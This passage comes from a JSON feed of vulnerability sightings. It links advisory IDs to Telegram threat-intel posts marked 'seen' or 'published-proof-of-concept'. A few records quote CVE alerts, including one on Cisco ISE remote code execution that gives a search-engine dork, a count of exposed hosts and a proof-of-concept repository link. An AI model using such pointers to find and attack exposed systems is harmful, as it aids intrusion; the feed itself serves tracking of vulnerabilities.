"vulnerability": "GHSA-H554-QRFH-53GX", "type": "seen", "source": "Telegram/ClQlCkUK_g-41DnO-lFV9vjntTb0h6MDzDnf9KQOdYwqtyI", "content": "", "creation_timestamp": "2026-01-07T19:09:06.000000Z"}, {"uuid": "ba93cf4e-c9d5-430a-a174-1e28c2c87d6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MGP7-W4W3-MHX4", "type": "seen", "source": "Telegram/og43KH01Plc8Iyz0Ogz7cm1eiVq8-Qgmh5W6-3KZk71D79o", "content": "", "creation_timestamp": "2026-01-07T19:09:24.000000Z"}, {"uuid": "319cc9bf-321d-466f-a08f-2919bfd4d209", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9RP2-4C6G-HPPF", "type": "seen", "source": "Telegram/og43KH01Plc8Iyz0Ogz7cm1eiVq8-Qgmh5W6-3KZk71D79o", "content": "", "creation_timestamp": "2026-01-07T19:09:24.000000Z"}, {"uuid": "cfdb3359-0954-4e1b-a595-6c0104ec1469", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H4WG-473G-P5WC", "type": "seen", "source": "Telegram/og43KH01Plc8Iyz0Ogz7cm1eiVq8-Qgmh5W6-3KZk71D79o", "content": "", "creation_timestamp": "2026-01-07T19:09:24.000000Z"}, {"uuid": "0fb05a60-40d9-495c-aaf8-d6e0fc3271e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9C23-RRG9-JC89", "type": "published-proof-of-concept", "source": "Telegram/dVBBzDLnAvxAWJ1LkZD-2V6hkrnURxr4dyAmSZABM3K_GIM", "content": "", "creation_timestamp": "2026-01-07T20:04:29.000000Z"}, {"uuid": "987e3b25-37ab-4cec-bb14-c70fbf523bf9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4GCX-GHWC-RC78", "type": "published-proof-of-concept", "source": "Telegram/dVBBzDLnAvxAWJ1LkZD-2V6hkrnURxr4dyAmSZABM3K_GIM", "content": "", "creation_timestamp": "2026-01-07T20:04:29.000000Z"}, {"uuid": "95d4a03d-955a-41d6-a315-af78a5e8ae3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HGP5-R8M9-8QPJ", "type": "seen", "source": "Telegram/FEXfoeJAqOIroyUDCRdgqul6wp9Eck5nAsZ9jdmneKfShFo", "content": "", "creation_timestamp": "2026-01-06T02:02:01.000000Z"}, {"uuid": "db80759e-bbdc-44ab-956d-58fd82cf589d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8C39-XPPG-479C", "type": "seen", "source": "Telegram/FEXfoeJAqOIroyUDCRdgqul6wp9Eck5nAsZ9jdmneKfShFo", "content": "", "creation_timestamp": "2026-01-06T02:02:01.000000Z"}, {"uuid": "fec86944-3655-459a-8252-2044a608460a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RGMP-4873-R683", "type": "seen", "source": "Telegram/FEXfoeJAqOIroyUDCRdgqul6wp9Eck5nAsZ9jdmneKfShFo", "content": "", "creation_timestamp": "2026-01-06T02:02:01.000000Z"}, {"uuid": "364886a5-744d-408d-8232-ba73e66d2c27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G66G-F82C-VGM6", "type": "published-proof-of-concept", "source": "Telegram/rxZzs7ray3g1wpNHhJrywO9yfcDTcZCq5FMaTnag1faY_Ko", "content": "", "creation_timestamp": "2026-01-06T03:00:52.000000Z"}, {"uuid": "62d14fb9-d809-4183-945d-1ed8ea5fdc46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H52R-JXV9-9VHF", "type": "seen", "source": "Telegram/-WkPGYxQLne2Z_5X7oW7Cjya-7O5zQTo5z5b79nEyipWZqE", "content": "", "creation_timestamp": "2026-01-05T19:06:46.000000Z"}, {"uuid": "4399e9c8-3a5e-4337-8f68-03498a0fa492", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-528Q-4PGM-WVG2", "type": "published-proof-of-concept", "source": "Telegram/VT6__BfG-NV3TfbCsF7d29L1QsNikCty5LjazQa3RLsn_wI", "content": "", "creation_timestamp": "2026-01-02T21:56:46.000000Z"}, {"uuid": "101f259a-fd82-4895-98f5-6c7486277378", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2G2W-VMG7-PQ4Q", "type": "seen", "source": "Telegram/OYffpMdaBj2T2f8vD_3Xr2_N56biRnySAWVcO0fFYvIpjNs", "content": "", "creation_timestamp": "2026-01-02T21:57:38.000000Z"}, {"uuid": "0341234e-9244-4fa9-80b3-8d34da9c1e22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C5CP-VX83-JHQX", "type": "seen", "source": "Telegram/hVIsWvvgLiiM_GtF82joYNFY3TrnJxWWlKsVG9afGpT3z9w", "content": "", "creation_timestamp": "2026-01-03T14:32:26.000000Z"}, {"uuid": "a14ace2a-42bd-4aa5-9b5e-2d546fd6e016", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FXM2-CMWJ-QVX4", "type": "published-proof-of-concept", "source": "Telegram/JAg_d3MmiB-mKId6ZqmxCsd9P9_WDn1i_DljyZ5VMvZMUD8", "content": "", "creation_timestamp": "2026-01-05T20:06:24.000000Z"}, {"uuid": "028d5aee-5753-4e94-8db4-613f4a8d91f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X4M5-4CW8-VC44", "type": "seen", "source": "Telegram/nm9du9wjltxMtcwJpPJKV121bbF8xLkPf7YZ6cUjHAdlMjM", "content": "", "creation_timestamp": "2026-01-05T21:08:15.000000Z"}, {"uuid": "8ae508d2-a13f-48ea-9239-2dba627b5d67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GVQ6-HVVP-H34H", "type": "seen", "source": "Telegram/OYffpMdaBj2T2f8vD_3Xr2_N56biRnySAWVcO0fFYvIpjNs", "content": "", "creation_timestamp": "2026-01-02T21:57:38.000000Z"}, {"uuid": "3ae159d3-3f1c-48e2-9413-c4edc54c18c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WWRJ-3HVJ-PRPM", "type": "published-proof-of-concept", "source": "Telegram/mJFISOaG9sdliiq532xrtHTh4hR6RCcMc304VWQpxZ4gXns", "content": "", "creation_timestamp": "2026-01-06T20:11:53.000000Z"}, {"uuid": "dee26e3d-d163-443e-b534-c21e0d0354d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-496G-MMPW-J9X3", "type": "published-proof-of-concept", "source": "Telegram/mJFISOaG9sdliiq532xrtHTh4hR6RCcMc304VWQpxZ4gXns", "content": "", "creation_timestamp": "2026-01-06T20:11:53.000000Z"}, {"uuid": "1027410b-4d43-41ef-9f58-1bd5b1bd0221", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0036", "type": "published-proof-of-concept", "source": "Telegram/t6YxizuttcmOMt4e3s_Y9UALO98h2j16YRSgOPpoTPjraT0", "content": "", "creation_timestamp": "2026-01-05T08:02:10.000000Z"}, {"uuid": "fe01fe42-ae92-4e8e-9b9b-4543fe29223c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PR6M-Q4G7-342C", "type": "seen", "source": "Telegram/-WkPGYxQLne2Z_5X7oW7Cjya-7O5zQTo5z5b79nEyipWZqE", "content": "", "creation_timestamp": "2026-01-05T19:06:46.000000Z"}, {"uuid": "fceca16d-ef0b-4e1d-aea6-e7bd0d7f4167", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H5XW-7XVP-XRXR", "type": "seen", "source": "Telegram/-WkPGYxQLne2Z_5X7oW7Cjya-7O5zQTo5z5b79nEyipWZqE", "content": "", "creation_timestamp": "2026-01-05T19:06:46.000000Z"}, {"uuid": "ce98b080-2698-4f82-9f81-d50640871ca0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F8CM-6447-X5H2", "type": "seen", "source": "Telegram/DM3pgu0_RzgLvzG-bb0EsBJeE-HNavxIR4FBWximsYdDyCg", "content": "", "creation_timestamp": "2026-01-05T23:05:27.000000Z"}, {"uuid": "e508589b-e13e-4af6-9c51-a3fdb863160e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-69F9-5GXW-WVC2", "type": "published-proof-of-concept", "source": "Telegram/pBIBejJY22UGYFBeCviRWB0sbqSJQWVhrb4WN5JzMLlOP_k", "content": "", "creation_timestamp": "2026-01-06T00:03:31.000000Z"}, {"uuid": "1a019f38-c773-414f-be5f-5ecfcb710e28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JJ3X-WXRX-4X23", "type": "seen", "source": "Telegram/2QW8Fh9GNw2oVUTZekwxOkJVN6yFYGFerNd9WhPSIM87K_Y", "content": "", "creation_timestamp": "2026-01-06T01:04:01.000000Z"}, {"uuid": "bc1ac469-24cf-439a-b4b2-bd886cee4a7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WCWX-794G-G78F", "type": "published-proof-of-concept", "source": "Telegram/rxZzs7ray3g1wpNHhJrywO9yfcDTcZCq5FMaTnag1faY_Ko", "content": "", "creation_timestamp": "2026-01-06T03:00:52.000000Z"}, {"uuid": "7d600102-363e-4f35-98fb-1add3dde45c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GC3F-GQPH-522Q", "type": "published-proof-of-concept", "source": "Telegram/fMtvesIEGvLKzgX_Vr04EQ2rBgwnPRUk0FUIDqd1543CWh4", "content": "", "creation_timestamp": "2026-01-05T19:06:38.000000Z"}, {"uuid": "97b4407d-257c-4105-9ee6-a611ed2aceba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GP9G-GF56-FCXX", "type": "published-proof-of-concept", "source": "Telegram/fMtvesIEGvLKzgX_Vr04EQ2rBgwnPRUk0FUIDqd1543CWh4", "content": "", "creation_timestamp": "2026-01-05T19:06:38.000000Z"}, {"uuid": "e9c9fb31-84fc-4800-8a94-a93ac751ecc7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5CG9-38QJ-8MC3", "type": "seen", "source": "Telegram/-WkPGYxQLne2Z_5X7oW7Cjya-7O5zQTo5z5b79nEyipWZqE", "content": "", "creation_timestamp": "2026-01-05T19:06:46.000000Z"}, {"uuid": "757c48be-3981-4fab-ad0d-2dce8046cc33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4P6R-M39M-9CM9", "type": "seen", "source": "Telegram/k0c9q7JOFJlmLU7FVkBurPf0ZMaMF70LArv-NA9Dq5JQpCQ", "content": "", "creation_timestamp": "2026-01-05T21:08:57.000000Z"}, {"uuid": "7e35a58f-94c9-4d2a-aa80-c6505952637a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QWXJ-QCH7-WHPC", "type": "seen", "source": "Telegram/k0c9q7JOFJlmLU7FVkBurPf0ZMaMF70LArv-NA9Dq5JQpCQ", "content": "", "creation_timestamp": "2026-01-05T21:08:57.000000Z"}, {"uuid": "64c84b28-34f7-4c73-9a93-348f7667315e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-234R-XRRG-M8F3", "type": "seen", "source": "Telegram/k0c9q7JOFJlmLU7FVkBurPf0ZMaMF70LArv-NA9Dq5JQpCQ", "content": "", "creation_timestamp": "2026-01-05T21:08:57.000000Z"}, {"uuid": "30e2cfde-0431-4c3b-80ea-a957999364a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M9RG-MR6G-75GM", "type": "seen", "source": "Telegram/DM3pgu0_RzgLvzG-bb0EsBJeE-HNavxIR4FBWximsYdDyCg", "content": "", "creation_timestamp": "2026-01-05T23:05:27.000000Z"}, {"uuid": "2cf5c51e-b2c4-4067-aa9e-5bace0543c97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PHPV-94HG-FV9G", "type": "seen", "source": "Telegram/DM3pgu0_RzgLvzG-bb0EsBJeE-HNavxIR4FBWximsYdDyCg", "content": "", "creation_timestamp": "2026-01-05T23:05:27.000000Z"}, {"uuid": "79474665-f88b-4487-9eb6-661b0a563165", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-829Q-M3QG-PH8R", "type": "seen", "source": "Telegram/DM3pgu0_RzgLvzG-bb0EsBJeE-HNavxIR4FBWximsYdDyCg", "content": "", "creation_timestamp": "2026-01-05T23:05:27.000000Z"}, {"uuid": "0de7da45-9f5c-4c2a-8a2d-a8d3f23f8000", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VRJC-Q2FH-6X9H", "type": "seen", "source": "Telegram/DM3pgu0_RzgLvzG-bb0EsBJeE-HNavxIR4FBWximsYdDyCg", "content": "", "creation_timestamp": "2026-01-05T23:05:27.000000Z"}, {"uuid": "9f01f5fa-43f5-464f-aac3-3f2c7a485db9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XJ39-3G4P-F46V", "type": "published-proof-of-concept", "source": "Telegram/SaQdu2HuKivKnxzQDHW0crSXnl1eIl3nAV9Cs1OYgaU4ueA", "content": "", "creation_timestamp": "2026-01-05T23:05:33.000000Z"}, {"uuid": "bdc74781-d460-4758-8c8a-fc9bb0ff989d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6MQ8-RVHQ-8WGG", "type": "published-proof-of-concept", "source": "Telegram/SaQdu2HuKivKnxzQDHW0crSXnl1eIl3nAV9Cs1OYgaU4ueA", "content": "", "creation_timestamp": "2026-01-05T23:05:33.000000Z"}, {"uuid": "f88a2ed6-08ae-4d5c-b80f-3365f640eb8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-255J-QW47-WJH5", "type": "published-proof-of-concept", "source": "Telegram/SaQdu2HuKivKnxzQDHW0crSXnl1eIl3nAV9Cs1OYgaU4ueA", "content": "", "creation_timestamp": "2026-01-05T23:05:33.000000Z"}, {"uuid": "e049c7d7-3f61-41ab-8531-22000ab3c396", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V64R-7WG9-23PR", "type": "published-proof-of-concept", "source": "Telegram/SaQdu2HuKivKnxzQDHW0crSXnl1eIl3nAV9Cs1OYgaU4ueA", "content": "", "creation_timestamp": "2026-01-05T23:05:33.000000Z"}, {"uuid": "c86c0b80-1247-4d1a-9f96-5c9309df2555", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-54JQ-C3M8-4M76", "type": "published-proof-of-concept", "source": "Telegram/pBIBejJY22UGYFBeCviRWB0sbqSJQWVhrb4WN5JzMLlOP_k", "content": "", "creation_timestamp": "2026-01-06T00:03:31.000000Z"}, {"uuid": "9eb368a4-7cff-4859-8617-d579e4442271", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6HJR-V6G4-3FM8", "type": "seen", "source": "Telegram/5veGiJvGsUhc9dGzExP3XDXSusiNY1vbpgmVDQc1udFyrC4", "content": "", "creation_timestamp": "2026-01-06T19:07:27.000000Z"}, {"uuid": "d9e820a7-b7e0-4d0a-b4c0-75b1f5163390", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G84X-MCQJ-X9QQ", "type": "seen", "source": "Telegram/2QW8Fh9GNw2oVUTZekwxOkJVN6yFYGFerNd9WhPSIM87K_Y", "content": "", "creation_timestamp": "2026-01-06T01:04:01.000000Z"}, {"uuid": "f6b46d50-cb19-425d-827e-8749e41e8657", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6JHG-HG63-JVVF", "type": "seen", "source": "Telegram/2QW8Fh9GNw2oVUTZekwxOkJVN6yFYGFerNd9WhPSIM87K_Y", "content": "", "creation_timestamp": "2026-01-06T01:04:01.000000Z"}, {"uuid": "82e0faf5-52ef-4eea-a49a-48443955b226", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MG98-J5Q2-674W", "type": "published-proof-of-concept", "source": "Telegram/831nHCRtL2evt5rniei0FJReQqtzOwaiGXzkQTpqhGeUo2I", "content": "", "creation_timestamp": "2026-01-06T05:03:26.000000Z"}, {"uuid": "896c4daf-fc7c-452a-9a0c-e51d8e86cb93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CHP2-4GV5-2432", "type": "published-proof-of-concept", "source": "Telegram/831nHCRtL2evt5rniei0FJReQqtzOwaiGXzkQTpqhGeUo2I", "content": "", "creation_timestamp": "2026-01-06T05:03:26.000000Z"}, {"uuid": "1ec625ee-bf69-4b3c-a6d6-d7f6e5d4ea89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PH89-6Q5H-WFW5", "type": "published-proof-of-concept", "source": "Telegram/pjsa9crbYJyAa6FDyR5SJC0uEoY9ltlgCqLY5PT_7-_UOQ8", "content": "", "creation_timestamp": "2026-01-06T15:04:12.000000Z"}, {"uuid": "21e5b069-d301-4b54-9d0d-81b3a41d2c2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4J2G-RVV4-86VG", "type": "published-proof-of-concept", "source": "Telegram/pjsa9crbYJyAa6FDyR5SJC0uEoY9ltlgCqLY5PT_7-_UOQ8", "content": "", "creation_timestamp": "2026-01-06T15:04:12.000000Z"}, {"uuid": "b7d5222f-6995-4270-8e12-b5d319eeeda8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P85G-F9Q7-JMJX", "type": "published-proof-of-concept", "source": "Telegram/FgOoUY_fy76mKk0ne6ntnrdKdY81xQt-oGQxIfAXT2Hgzdk", "content": "", "creation_timestamp": "2026-01-06T16:03:52.000000Z"}, {"uuid": "de7ee2c7-efa1-4699-9982-72c39cdb48b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0723", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13261", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6535\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver, causing kernel panic and a denial of service.\n\ud83d\udccf Published: 2024-02-07T21:04:21.409Z\n\ud83d\udccf Modified: 2025-04-24T15:58:14.946Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0723\n2. https://access.redhat.com/errata/RHSA-2024:0724\n3. https://access.redhat.com/errata/RHSA-2024:0725\n4. https://access.redhat.com/errata/RHSA-2024:0881\n5. https://access.redhat.com/errata/RHSA-2024:0897\n6. https://access.redhat.com/errata/RHSA-2024:1248\n7. https://access.redhat.com/errata/RHSA-2024:2094\n8. https://access.redhat.com/errata/RHSA-2024:3810\n9. https://access.redhat.com/security/cve/CVE-2023-6535\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2254053", "creation_timestamp": "2025-04-24T16:06:40.000000Z"}, {"uuid": "6134e571-7d85-4ef6-8063-0c40cf225026", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4W9V-7H8H-RV8X", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18504", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-25677\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: In Min before 1.31.0, local files are not correctly treated as unique security origins, which allows them to improperly request cross-origin resources. For example, a local file may request other local files through an XML document.\n\ud83d\udccf Published: 2024-02-09T00:00:00.000Z\n\ud83d\udccf Modified: 2025-06-16T18:12:14.109Z\n\ud83d\udd17 References:\n1. https://github.com/minbrowser/min/security/advisories/GHSA-4w9v-7h8h-rv8x", "creation_timestamp": "2025-06-16T18:38:59.000000Z"}, {"uuid": "2baa6f06-5ad0-443c-8180-1d295c78bb49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:3810", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13261", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6535\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver, causing kernel panic and a denial of service.\n\ud83d\udccf Published: 2024-02-07T21:04:21.409Z\n\ud83d\udccf Modified: 2025-04-24T15:58:14.946Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0723\n2. https://access.redhat.com/errata/RHSA-2024:0724\n3. https://access.redhat.com/errata/RHSA-2024:0725\n4. https://access.redhat.com/errata/RHSA-2024:0881\n5. https://access.redhat.com/errata/RHSA-2024:0897\n6. https://access.redhat.com/errata/RHSA-2024:1248\n7. https://access.redhat.com/errata/RHSA-2024:2094\n8. https://access.redhat.com/errata/RHSA-2024:3810\n9. https://access.redhat.com/security/cve/CVE-2023-6535\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2254053", "creation_timestamp": "2025-04-24T16:06:40.000000Z"}, {"uuid": "f64286b2-b180-482d-8a0a-dd57227f6a16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RC4F-42XM-HVJW", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/18657", "content": "\ud83d\udea8CVE-2025-20281 &amp; CVE-2025-20282: Unauthenticated RCE Vulnerabilities in Cisco ISE and ISE-PIC\n\n\u2022 CVSS: 10\n\u2022 ZoomEye Dork: app=\"Cisco ISE\"\n\u2022 Results: 1,937\n\u2022 Advisory:\ngithub.com/advisories/GHSA-rc4f-42xm-hvjw and github.com/advisories/GHSA-w8p2-wjjr-hr24\n\n\u2022 PoC: github.com/abrewer251/CVE-2025-20281-2-Citrix-ISE-RCE\n\n\u2022 ZoomEye Search: zoomeye.ai/searchResult?q=YXBwPSJDaXNjbyBJU0Ui\n\nhttps://darkwebinformer.com/cve-2025-20281-cve-2025-20282-unauthenticated-rce-vulnerabilities-in-cisco-ise-and-ise-pic/\n\n\u2014\u2014\u2014\u2014\u2014\n\nFollow @zoomeye_team's official Twitter/X account and send the message \u201cDark Web Informer\u201d via DM to receive an extra 15-day membership. \ud83d\udc99", "creation_timestamp": "2025-06-30T19:28:14.000000Z"}, {"uuid": "84a735df-50be-4f87-92e8-c383978c3cab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W8P2-WJJR-HR24", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/18657", "content": "\ud83d\udea8CVE-2025-20281 &amp; CVE-2025-20282: Unauthenticated RCE Vulnerabilities in Cisco ISE and ISE-PIC\n\n\u2022 CVSS: 10\n\u2022 ZoomEye Dork: app=\"Cisco ISE\"\n\u2022 Results: 1,937\n\u2022 Advisory:\ngithub.com/advisories/GHSA-rc4f-42xm-hvjw and github.com/advisories/GHSA-w8p2-wjjr-hr24\n\n\u2022 PoC: github.com/abrewer251/CVE-2025-20281-2-Citrix-ISE-RCE\n\n\u2022 ZoomEye Search: zoomeye.ai/searchResult?q=YXBwPSJDaXNjbyBJU0Ui\n\nhttps://darkwebinformer.com/cve-2025-20281-cve-2025-20282-unauthenticated-rce-vulnerabilities-in-cisco-ise-and-ise-pic/\n\n\u2014\u2014\u2014\u2014\u2014\n\nFollow @zoomeye_team's official Twitter/X account and send the message \u201cDark Web Informer\u201d via DM to receive an extra 15-day membership. \ud83d\udc99", "creation_timestamp": "2025-06-30T19:28:14.000000Z"}, {"uuid": "088b9237-00f8-4422-9110-10b46ed01912", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5GPX-9976-GGPM", "type": "published-proof-of-concept", "source": "https://t.me/cKure/2502", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 A good writeup of RCE.\n\nhttps://github.com/wireapp/wire-desktop/security/advisories/GHSA-5gpx-9976-ggpm", "creation_timestamp": "2020-10-12T08:45:00.000000Z"}, {"uuid": "83b5e5e2-fc4c-44ef-b3c3-e7fe9cf9a3f6", "vulnerability_lookup_origin": 